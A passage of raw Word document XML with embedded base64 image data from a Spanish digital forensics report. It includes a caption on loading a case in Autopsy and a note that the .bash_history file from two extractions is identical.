6o7sDWZdi/eSkW+CVKy4S1IJNmSWhdMwCs3a3X&#10;J93utWYcERHNWhWFvMzIINLqZ6Q57AxQov39iJr+1JAKgETnpCNIDauIt2wt1i4D9g+n1JDaWrh+&#10;J1TOAwa2oVSD3t4RFdbKZEPrssULnQHK8kQCy00/ERHNThWFvHBTi/6Z7mlEayKj+61UdwjSyCeS&#10;bSGEbHOetP65y7utCeg5Tatfa3d3brwdhxS67TDp2DRIs92RFHTGW70BG1brlIeUK3jZMqx0Szfb&#10;9j6H3zh/CxGVdakophsOXeVi3a3YoYPm3vgCSIOcGFijhktznse0bgsXL9E/pbWwaFm4oJSbncYM&#10;t6/zStCF67Xl34Lh2WUF2E4iIspXWbk22o+JvojulaCnQ5oJe9H+XOk2NjqJyX5p31NhrbEHaVve&#10;nehDJN2DRldoS481Y5cap5erxnWp5aW625BEBH0TTknYWRbR7OW0ei3D6uhCE472Y9imPBV6dHgz&#10;Zc+8kqffuDLo8vDC9dhjyqonZEH7N2OdCkvLE7nlrt2txiWWe06bZ3lCl4SFLgu7w5cEOVcp15aO&#10;g5eDl2HrAVl/AsslyC3djP2uUvSe9dJ6uBdxGW7LxQe2YpnazqVl1ZyJiM49FV94EY7v08ErF/a6&#10;UNCol5MaUmFNSbY5LXIS+PSInEhnO6T4G27vVLFOLW88g3Cz7kNPYy5EEs1eplSrgt3mpQuc8COv&#10;TMnWlkrXtjuFzoWLneAk/MaVY4ktqdqWL9t05yfAtAvX78mGOLF/8zpdGp6y3dHVKrYBAyMBA9iy&#10;1VB5WMuWhVdHkSsMK3tHoNcysMZpxZPAp0cQEZGfikOeJWHPCXppqFxWVObQmP4Z6ZvIXqgRpGVO&#10;B0nTLKhbDLNlXKJZyJRqcxdFHHDOlSso2VafDZdrIVlLyrIShLD1gNM656OcaYWEPSfomdJwDWSD&#10;qnHk8EH9c5lso2nh0520RBIRkafKLrxIdLta7TIYGdSXYcBeh+G0wOVkW+d6tudus5JK5LX8pQdH&#10;dICzF3XEOkwAjParQDgK98W7RLPR1Jao3LlyUrK1rXPOFbc2mDn8xpWyN74UUuldtnUDlqt5nUzk&#10;lIxtQLLyWwj9p7WO7Ii7Luiw27YMksWWtzvB0F5FbI+BbdkT++24w/77lG0F3JZ/vp0dvn/zrbnb&#10;tuzdUfIiEyKic12FLXljuoTqXBDRiJ60nDe3D3Eb8uK9OpRlL7wIx7FPzsNDEm32Ioq2QWdiS87R&#10;U8Mbe1TEi41CGvnkIg5nHebcvF1xXdIlmo1s+JHAZGUvWhhW34P1e/Q5cc55bU4ws6SFzGtcUXJO&#10;mpQuVbdmwDmvzTl/bSHWb5Lg5ZSM1w3rqbMWrt8EGetceHHEd9qcg075Wa9Ptk3Wtwd6dcsTugXQ&#10;nqsn5xVKi5tuZFu+wVz165RZtx10B8wi5PxAe76d2Td97p8djgGsMcMXrPHcWCIiMkL33HPP5A03&#10;3GBengVydW2binB9E9hnUyLRLHDy5EnTR0RENPdM+5w8IiIiIpp9GPKIiIiI6lBF5Vo5T45oLpKr&#10;uoMqt1wr54oRERHNFmf/nDyiWYrn5BER0VzGci0RERFRHWLIIyIiIqpDDHlEREREdYghj4iIiKgO&#10;MeQRERER1SGGPCIiIqI6xJBHREREVIcY8oiIiIjqEEMeERERUR1iyCMiIiKqQwx5RERERHWIIY+I&#10;iIioDjHkEREREdUhhjwiIiKiOjS9kJfqRijUjZR5WXV6+SHTlVpPCt2hViQy5mXVeC23VusjIiIi&#10;mr4KQ14GiVYVvIaAmBlSdZkEWtuA0clJTEo30YxDtUuTMxzYGBCJiIiotioMeWHE96ng1d9hXtdA&#10;ZhzpSLNakxGOIx41/URERETka/aekxftQCzdg65izV3SyleqjOs5jWmFNOOcVrU2JJFGT6Ma1l1h&#10;c2He+kLILaZG6yMiIiLyMYsvvIiif3ICnYONBaFJhaTGQXROmDLuKLBlShD0mkYCVyMGOyec4apz&#10;1jOKGCLok+n7izUXmkBmgprTSVCzZH09aBk165vow1ibKcemtqOnZbTM9RERERFNzywOecKUhXVo&#10;MkEvcwhj7tDVlkR6vCDkeU2TGcFgOobeeLYIHJAJZCaoOZ0ENUOvL4YOm9fCcfTG0tCbFW5GJNmG&#10;Vp6AR0RERDNoloc8Q4WmXX0RJIdsc14sd0GGdEVbw4JMMwPUtu9T69+FLh04WZ0lIiKimVDlkCfn&#10;m1XpqtFUwrWcDEYG04g0h1VoakILkkVKtC5e04Tb0RkpMW8lzPqyGTSTwJakq2VPCcf3YUIF1bFD&#10;VV43ERERURGz+MKLJoxnz4Nr1Oe17dNl1ij6J/qAHudcPd1NaR7zmkbKv6NocQ13Zo2iIzadCyGc&#10;9UlJWS9Xnw/Yr4Yqrnv9Nfa0mFLxdNdHRERE5C90zz33TN5www3mJRFZJ0+eNH1ERERzz9w4J4+I&#10;iIiIysKQR0RERFSHGPKIiIiI6hBDHhEREVEdajhz5ozpJSIiIqJ6wZY8IiIiojpUcchLdZt7wqmu&#10;Zo/sct1jLhTqhv8d5ap4I+Y8stzcvtZ0f0VZ+zxz3O+3u+Pj2oiIiGanykJeJoFDHfaRYXJz4a7q&#10;hyu1jtY25B5NNtGMQzVLPKUCovvZteZmyiVvYlxB6JzRfS5PtD+3/zHX8XBuUE1ERESzTWUhLxxH&#10;PPvIrjCaI6a3mjLjSEea1dKNvHWeTc7TLSLJoeq3ss3afSYiIqK5pgrn5GUwnm5BU7UbdKIdiKV7&#10;0FWsKUxavLIlQ4+Spuc0GSRa7fCQei0tbm1IoozHjJln4Npn1eaVMvX8xZc5dboCgffZPo5NFLYY&#10;ul87/d3drWoeewzy9z+7nCDHdApnWXm7IuXm1oT0ONuRyi03r7Rb0fqIiIgoqGmHvFR3G8b6NjrP&#10;aa2qKPonJ9A56DxnNi/U6GfDmvLhKLBlSijymkZCSSMGOydM6XFSDZP1uEqQ/eXvSV4pM7lFBazi&#10;y5w6nR7s4rfPPWgZNfPr5+QGLQWnMda8S80nz9Kduv/OpgU5psWEEe+NIWnTrpIaSiLWGzevVMjd&#10;Auwy24xsWb/S9REREVFQ0wh5TivOluaJGp6XpULEPicgyMP/dejJHMKYbSGTVqC2JNLjBQHBa5rM&#10;CAbTMfRWZXsjaLaLyV4sIa13PgJN57XPMXTY/BmOozeWRuFuFxdBZ7vZUK/9D3JMvUjrY7Z0ncLQ&#10;WB82ZnOyCrm74k752b3N01kfERERBVJhyJOA1yVNNDNz4r0KCLv6Iq4Wo1ju4gTpira+BZmmQjos&#10;mRK1lB2zF0tMQG1mcUGns6bsc61Veryi2Ng3plviMoktGOtsz51TmCeDQ2OmV6vh+0NEREQVhrzU&#10;dvS09GJqvksVnB82DamEazkZjAymEZGms3ATWpD0L+95TWPOpZteadCWTqX8qbgvltDhT3qKCDJd&#10;iX3O5j0VGLckbcueXPjiatVLDXm3Enrtf5Bj6iPc3gkMbsf2QeRaDbU0BkfMMk0rot7maa6PiIiI&#10;Sqso5GWkSSbZZkqPTlf1+6VFmzBuy3mhRhUqR02roXN1K+Q2Jnb9eWf+C69ppBRqboFihjuzRtER&#10;M+XDKcsSrtJiaAuaJ+y5bEp0I/rQg0YZ1zWOlmwLXcEyPadzKbHPUr7V4/T5bCZkyj7JeXF23JC0&#10;kXnx3v/Sx9SHlGJbkkhOCf4RtIx3OctzB+Ppro+IiIhKCg0PD0+uWrXKvCSqjFw5PNThCr+6VVcC&#10;8b4iLb5zw8mTJ00fERHR3DPtq2uJdPk474ILIiIiOtsY8mganCusdfnYXkVLREREswLLtUQeWK4l&#10;IqK5jC15RERERHWIIY+IiIioDjHkEREREdWhCkOeOeHe3OOsZrc4yz4GTLpSD7Gv4o2Y88hyc/sq&#10;XdXvCehW1j4TERERFVdxyGvqNY+j0jfprUEYyXsMmKynGYdqlnhKBcQI+uzD9CfNzYRLJtsKQueM&#10;7jMRERHVswpDXhRRe080/YiqGnA/BkyE44jPivuwOU9riGQfyl9Fs3afiYiIaK6Z/jl58qzUWId5&#10;XFUVRTsQS/egq1hTmLR4lSppek6TX2p2WtzakLSPLgtSezbPgLXPkpWnPdjlOfMXX+bU6QoE3md3&#10;ibywxdD92unv7m5V89hj4FFqD3JMiYiIaM6oOORlEhIcVCAY6sBk7llWVRRF/+QEOged55vmhRr9&#10;7FZT0hxFkQfde00jAacRg50TpvQ6qYbJekYRsyXZCvYl2m/WI8tJblEBq/gyp06nB7v47bM8+9XM&#10;r0vkQUvBaYw171LzyXNjp+6/s2lBjikRERHNJRWHvHB8nxMIOoZUICnz3LPA5IH6NtSY0JM5hDHb&#10;QiYhsy2J9HjByr2myYxgMB1Db1UephpBs11M9mIJab3zEWg6r32OocPmz3AcvbE0Cne7uAg6282G&#10;eu1/kGNKREREc8r0y7XRfowGDhwVUqFmV18ESVsfVYEne3GCdEVb34JMUyEdllrQJFkp72KJCajN&#10;LC7odNaUfa61Gh4vIiIimnGVhbxUynXOVgpDSduq5ZwDVpVWvVTCtZwMRgbTiMhK9IUeSf9yotc0&#10;5ly66ZUibelUyp+K+2IJHf6kp4gg05XY52zeU4FxS9K27IXRHHGFbDlH0vRO4bX/QY4pERERzSmV&#10;hbzwIWzRZUen9IjRfahKBdQt2oRxWz4MNaKnZRT79Eqcq1shtzGx25A7ec3wmkZKoeYWKGa4M2sU&#10;HTG/Cy9cpczQFjRP2HPZlOhG9KEHjTKuaxwt2Ra6gmV6TudSYp+lfKvH6fPnTMiUfeqNIWnHDUmb&#10;nBfv/S99TImIiGguCQ0PD0+uWrXKvCQi6+TJk6aPiIho7pn+OXlERERENOsw5BERERHVIYY8IiIi&#10;ojrEkEdERERUhxjyiIiIiOoQQx4RERFRHZp2yNPPsG1NoHa30c1/oH5V1mUfL6aWpZ9EUbPHsvmR&#10;G0d3u24qTVTKXsQXLMACV7dixxEz7lwhx2AFqrvbtVhmtfhtWyXbXet9ne7ya7V9QZdbzfXX+lh7&#10;kfUW+T1xZAdWZLfnbG2blwq2J29/ZptaH9/gy59myEthe4/XIx6qQAewRoz3uh63tQsYmVYyUuGq&#10;LYmYPOx/Xxzy+LB9kzW4mfOsU8WnkdBZtAxbD5zAiRPS7caSzUuxIL7XjPMy236h0+xT6WfkXPxs&#10;zYV9dv+eOIE96xcCC9djz4k9kN66UG/7UyPTCnmZxBagrw+lHsNamQwSXfL4MNfTJYQKZXH364rY&#10;x7ARzWXLkTiwFcsGRtSfHSIionyVh7xMAl3jvehvN6+rTT/f1T6f1YNu6cuVcnNP4jKtVglTllVd&#10;q27CkuFtSJrHlOWGuVq4XMtsTSRc4wpbwtyvnf7u7lY1nynB5m1bqbKsWdaU7TU8tyl/XG49+SVu&#10;Z/m5/eYjy+rIwihWLxvAiEl5e+OuMo1u4ZNWhzUYwH5sXmqHFZuu0BHsWJGbJjuJLpEUGT6ldcP9&#10;2umPx1eoeeImkAZZvp22CNd07pJ18f3yWFchj2V6blPR4Wa/d8TNcO+Suud7kLcdh81AI+A4r+2c&#10;Mo9W/DOSv7xix81jPpG3zgDH0ovvNhR/X0t/tgv4HJ+qfJ88jkVZn9Vyj1tR5rNZ7ONYdPmlvzfF&#10;98FZT973Pej2exyr4vO798f0e33v8pa7w/M4+O2P17L93vv1C51jmDd4r1rOih1qk+T4FJnX61jl&#10;7UOx73FxFYY8aWUbROfGaTep+bMP9C9KBZdGp6VPl3H1s13dIUwFmvEOZ9xoDOme7WqOKPonRxFD&#10;BH0Tk+a5sG75y9yFQe+H/U+RxljzLjWfPFNWliPPlzXbNooAD/8vtr3Cb5s81pParp97q4epTj+b&#10;1rXfk3lNo1RPlidypdy1A9vUL7LlSEi/Ld8klntMpwfn7L0Vm5fsNtOcgDOb+mW3dDOW7DbzHtiK&#10;g2s8/mhMsR8HF+9U8yWwXP/xWIrh1QeKLH8Yq22ZaTewrejC1R/YbcBOPc1a7N98a/YXYdH9Krov&#10;hVzLVPuFzevMfnltk9+2qmUdbjfD87fPrfh7kH+Md2JYBQqr1Div7fSaxyr2Gcmfr/h7Xfyz5f3+&#10;eG2jF79t8PoMBfhs5/E/PtP/Pnl9rjzm8fzelXPchFqvhFATCgqyRwGP5Qf43vjtd+77HnT7y/0O&#10;FvL63vm/x26+76PHd9p7Hqj+hVi/aS0G7L/Clb0jA1i7aT0Wrt+Tm0/9t1sfYK99Db4PhSoKeZlE&#10;FwY7d9X+PLb0uPdFFplDGFOxJdvSF46jN5bGeHYGFWhsCI12qCnHcKhUzpJlRvpgZwvHe30e9l8o&#10;gs52c0D0tplWM2lNa0uqXSm1co/t9dsmr/WEmxFJtuW3BlIdW4bF9rwU+Vei/sUurQ0+Sk23cDGW&#10;Dawp+NfwYRxUv4za7S/7heuxae1+HC72+3aKZVgdNRt5JIXh/WuxqfBkGr181x+nNQPYX3Th6g/s&#10;TvVLUnqXt6stOpjbhmL7VWxfpnAt071fXtvku61qWRvMQSrcPrdi2yrLXbYVdvaF6zep+Y1S47y2&#10;02seP3p5lb/XRd8fr2304rcNXp8hEfQ7IEodn2l/nzw+VyLoZ7Xc46ap9dqgoLpiAS3La/lBvjc+&#10;+537vgfd/jK/g1N4fO9Kvcdufu9jsWWLUp8RmT57Ss1ejBzMbYvYG18DlfBUGFa89rWcfShQUciT&#10;iy3SPY1OsGjsQTrdg8ZqX2EbbkdnJImhOVtZjGHUtKTprmatZ0XWoy8mkVa/Lv0esTpbx/QfuyVO&#10;yJPmfPl9oX+xH8DWZc4kUwSZTv2S3aP/xbhO/7LxbwmoJvUvWvOHSXe+f50KeO1X2ftyBIcPml7N&#10;a5tqsK3TMo3tmTE13sZqHtdqfp801+eq7M9qrd/bIssv9b0p61iXu/1Bv4NVVMlnJ9A8y7Fh60Hd&#10;IndkxzYcXB11gqxQAXENdheE8Orua0Uhr98dKib6EIn0YWJfHGEpH+adtzYdYcR7Y0i2FYSUTAIJ&#10;eR1uQgtcIVAN35IscQ5fKbJMFVi3m2XKhSW50mgYzRFXS2FqyLuUa7atdIk2AL9tKrGecHwfJvoi&#10;GCvZhElzk23Cz/0rcP+yxc4vEB3+pKeIoNMpUlI4oH5zHZR/Tap/2S9R/1bNVh7UL7htA7alZSEW&#10;L3O3UowU/1etMOcRTim5mOUXL8UEUGK/8vZliv0YTpnhppVI75fXNtVqW2W5+zfjVnOM5Y+Cu5XH&#10;d5zXdnrN48csr/h7XSGvbfTitw1en6EyPtua3/GpyvfJ43NVzmfV87ip77/HuWVlKfG+eH5vgh6f&#10;wO97md/BoPzeY7dyPzsi4DwLo6uB4Vtx6zByLZzy/klAdIc4r3313Qf/z0HlF17MhGi/OdfOlCOl&#10;6wLadZCLot89Tp+bJufDTYda5qgTLGWZXeh0lWtzoVOvb0ja0Lw42wbb2ildxc1pftvksR57H0DV&#10;Nfa0oFfX1aPoiPHCi7nP1ZS/YBsWH3CVYpZvwFZsxlIZt+4wlmT/Vbkc7WvNfPLPcc/pXLIliAVY&#10;unmJKYs5V/MeXOMMX6DPHTEBU/2a0+ee2HEj8u9RL2raPeb2L2YdTiuBs3y1odnhhScy+/Lar6L7&#10;UmgZlhx2WiwWuIOz5zbVaFtlubtzx3EdVruOY4lxXtvpOY9bwWfELK/4e+1WOJ8fr2304rcNHp+h&#10;IJ/tPD7HpyrfJ4/PVVmf1XKPW7k8ll/qexP4WAfd/nK/g0H5vMduZX92lKDzSPl5yQAGlmzK3vJF&#10;yrRqCNbYfZKLMTz3NeA+FBEaHh6eXLVqlXlJeeTK1cZx9OqLKWaJ2bhNderkyZOmj4iI6oKUWJce&#10;xiZ9UcjMkatwR9pLnB9ZA7O7Je8sS23vQdr3Ct+ZNxu3iYiIaC7Ye+vmXIl1psipBgUXXMwUhrw8&#10;+feXa0vGMKrPNTybZuM2ERERzQX59/tbM7AWu/eYq3hrzqxbTjWwVw7PMJZriTywXEtERHMZW/KI&#10;iIiI6hBDHhEREVEdYsgjIiIiqkMVh7xUd+5iAN1V+4kXltwyxKzD7/ZumUSr5zTe4+TmzQX7obqa&#10;Pw7MdR87p+s2z6klIiIiqo4KQ14Gh8bUD3nShX3yRY2u+MyMDCJt+mv25AbXfsgTIvQj24LcMNiE&#10;tbLuLSyhtS0JxEazTw0ZDf6AXCIiIqJApleubWmq8a08MhgZVBEvEkMsAqQHR2rTWugSju+CynlA&#10;ckvJx7OlhjwfbObJhtZIc+7IRft5Y2MiIiKqropb8sYlqSTbTLmxWs+rLZAZgc54nRuxsVOnPIy4&#10;1mPLsNI19tj2PoffOH9htMu6VBTTz6l1lYt1Z8rSUq6WBjmhHzkmzXke07qFm1r0T2ktLFoWLijl&#10;Zqcxw+3rvBJ04Xpt+bdgeHZZAbaTiIiI5rYKQ14U/abUKM+WjahA1NNY/fPKnFavCDrbwyYcpTFo&#10;U54KPTq8mbJnXsnTb1wZdHk4HMc+u6+yoHQPulRYivbnlhsbVeP6o57T5on265Kw0GVhd/iSIOcq&#10;5drScfBycAR9E7L+fkQlyDXK0zFypeh9+hm2KXTLcFsulvdPbWdjWTVnIiIimu2mV64VKtj06rAz&#10;huqeMmdKtTpAhpzwI69MydaWSmMdTqEz3OwEJ+E3rhwtTaakalu+bNOdnwDThuP7siFOpHu6dEvo&#10;lO1u71SxDUgOBQxgkU6oPKxly8Kd7fkl9dQQ9FpsK6wEPj2CiIiI6sn0Q16tmFJt7qKICedcuYKS&#10;bfXZcBmDZC19FbEKQuibcFrnfJQzrZCw5wQ9UxqugWxQNTL6ihk5rGobTQuf7qQlkoiIiOpGZSEv&#10;k0C36/yuLdI0ZFqR7LliRc83K8PUlqjcuXJSsrWtc84VtzaYOfzGlZLqboRUeiN9GxFV8zqZyCkZ&#10;24Bk5bcQ+k9rZRLdrvMX7bZFINdhRDucYGivIrbHwLbsibRJgxl9UqS3bCvglvzz7ezwdM/2XHk9&#10;lajNOZVERER01lTckjdmzifT5T5pbavyLVRs+JHAZGUvWhgcAeL79DlxznltTjCzpIXMa1xRck6a&#10;7Ivq2pLOeW3O+WthxHUt2ikZdw3qqbPC8V7IWOfCi4zvtDljTvlZr0+2Tda3D3p10X7dAmjP1ZPz&#10;CqXFTTeyRTeaq36dMuuWMXfALELOD7Tn25l908HbDkcSbWZ4qM1zY4mIiGiOCg0PD0+uWrXKvCQi&#10;6+TJk6aPiIho7pm95+QRERERUYWA/w+Hq+/ZsYu50gAAAABJRU5ErkJgglBLAwQUAAYACAAAACEA&#10;zjKwAOAAAAAIAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBSE74L/YXmCt3azsaka81JKUU+l&#10;YCuIt23ymoRmd0N2m6T/3udJj8MMM99kq8m0YqDeN84iqHkEgmzhysZWCJ+Ht9kTCB+0LXXrLCFc&#10;ycMqv73JdFq60X7QsA+V4BLrU41Qh9ClUvqiJqP93HVk2Tu53ujAsq9k2euRy00r4yhaSqMbywu1&#10;7mhTU3HeXwzC+6jH9YN6Hbbn0+b6fUh2X1tFiPd30/oFRKAp/IXhF5/RIWemo7vY0osWYbZYJhxF&#10;4EdsP6t4AeKIEKvkEWSeyf8H8h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3b+YjlgEAACODAAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAKAAAAAAAAACEAql3q/JM3AACTNwAAFAAAAAAAAAAAAAAAAAC+BgAAZHJzL21l&#10;ZGlhL2ltYWdlMS5wbmdQSwECLQAKAAAAAAAAACEApv+rGR0sAAAdLAAAFAAAAAAAAAAAAAAAAACD&#10;PgAAZHJzL21lZGlhL2ltYWdlMi5wbmdQSwECLQAUAAYACAAAACEAzjKwAOAAAAAIAQAADwAAAAAA&#10;AAAAAAAAAADSagAAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAC5s8ADFAAAApQEAABkA&#10;AAAAAAAAAAAAAAAA32sAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAcABwC+AQAA&#10;22wAAAAA&#10;">
                <v:group id="_x0000_s1174" style="position:absolute;width:60890;height:13696" coordsize="60895,13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5NSyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9fa8Iw&#10;EH8f+B3CDfY2k1o2a2cUkW3sQQR1MHw7mrMtNpfSZG399stgsMf7/b/lerSN6KnztWMNyVSBIC6c&#10;qbnU8Hl6e8xA+IBssHFMGm7kYb2a3C0xN27gA/XHUIoYwj5HDVUIbS6lLyqy6KeuJY7cxXUWQzy7&#10;UpoOhxhuGzlT6llarDk2VNjStqLievy2Gt4HHDZp8trvrpft7Xx62n/tEtL64X7cvIAINIZ/8Z/7&#10;w8T56SJTc5WpFH5/igDI1Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAj8eTUskAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:shape id="Imagen 71" o:spid="_x0000_s1175" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente" style="position:absolute;top:100;width:29571;height:1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Ch3ygAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasJA&#10;FIX3hb7DcAvd1YmhRo2OUoRCF91URczumrlNQjJ34sxE07fvLApdHs4f33o7mk7cyPnGsoLpJAFB&#10;XFrdcKXgeHh/WYDwAVljZ5kU/JCH7ebxYY25tnf+ots+VCKOsM9RQR1Cn0vpy5oM+ontiaP3bZ3B&#10;EKWrpHZ4j+Omk2mSZNJgw/Ghxp52NZXtfjAKmmLoFm4mi3Yshss5Ddf29Jkp9fw0vq1ABBrDf/iv&#10;/aEVpOnrbDmfZhEiIkUckJtfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANloKHfKAAAA&#10;4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                    <v:imagedata r:id="rId206" o:title="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                  <v:shape id="Imagen 70" o:spid="_x0000_s1176" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Texto, Aplicación, Correo electrónico&#10;&#10;Descripción generada automáticamente" style="position:absolute;left:29843;width:31052;height:8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A/TzAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8Mw&#10;DIXvSPyHyEjcWErRKtYtm6YK0DhwWIFpR6vx2mqNU5qwln+PD0gc7ff83ufVZnKdutAQWs8G7mcJ&#10;KOLK25ZrAx/vz3ePoEJEtth5JgM/FGCzvr5aYW79yHu6lLFWEsIhRwNNjH2udagachhmvicW7eQH&#10;h1HGodZ2wFHCXafTJMm0w5alocGeioaqc/ntDBSHQ/Z6/Cq2Ov08j7un00s5vjljbm+m7RJUpCn+&#10;m/+ud1bwF+nDfJ4uMoGWn2QBev0LAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAMowP08wA&#10;AADjAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;">
                    <v:imagedata r:id="rId207" o:title="Interfaz de usuario gráfica, Texto, Aplicación, Correo electrónico&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1177" type="#_x0000_t202" style="position:absolute;left:30196;top:9250;width:28105;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fyygAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwBC/i0ro6bV02xlBQL8O6i7dH89ZUm5eSpFv99kYQPL7f/7dcT7YXR/Khc6wgn2UgiBun&#10;O24V7N+fru9BhIissXdMCr4pwHp1frbESrsTv9Gxjq1IIRwqVGBiHCopQ2PIYpi5gThxB+ctxnT6&#10;VmqPpxRue3mTZQtpsePUYHCgraHmqx6tgl3xsTNX4+HxdVPM/ct+3C4+21qpy4tp8wAi0hT/xX/u&#10;Z53mF2Vezsv87hZ+f0oAyNUPAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEomF/LKAAAA&#10;4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="283A7CF0" w14:textId="3FF82D40" w:rsidR="00FB12A0" w:rsidRPr="00D9223C" w:rsidRDefault="00FB12A0" w:rsidP="00FB12A0">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>46</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="118" w:name="_Toc155782613"/>
                        <w:r w:rsidRPr="004908D6">
                          <w:t xml:space="preserve">Carga de nuevo </w:t>
                        </w:r>
                        <w:r w:rsidR="00501A15">
                          <w:t>c</w:t>
                        </w:r>
                        <w:r w:rsidRPr="004908D6">
                          <w:t xml:space="preserve">aso en Autopsy y </w:t>
                        </w:r>
                        <w:r w:rsidR="00501A15">
                          <w:t>d</w:t>
                        </w:r>
                        <w:r w:rsidRPr="004908D6">
                          <w:t>atos de fuente añadidos correctamente.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="118"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Por otro </w:t>
      </w:r>
      <w:r w:rsidR="00454796" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lado,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se ha comprobado los datos de la extracción de la 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A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00454796" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>así</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> como de la extracción del HDD que el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00454796">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/volcado-datos/home/ubuntu/.bash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, son exactamente el mismo. Se adjunta imagen </w:t>
      </w:r>
      <w:r w:rsidR="001A130A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251791360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22747505" wp14:editId="34172D6C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2138045</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5441950" cy="1828800"/>
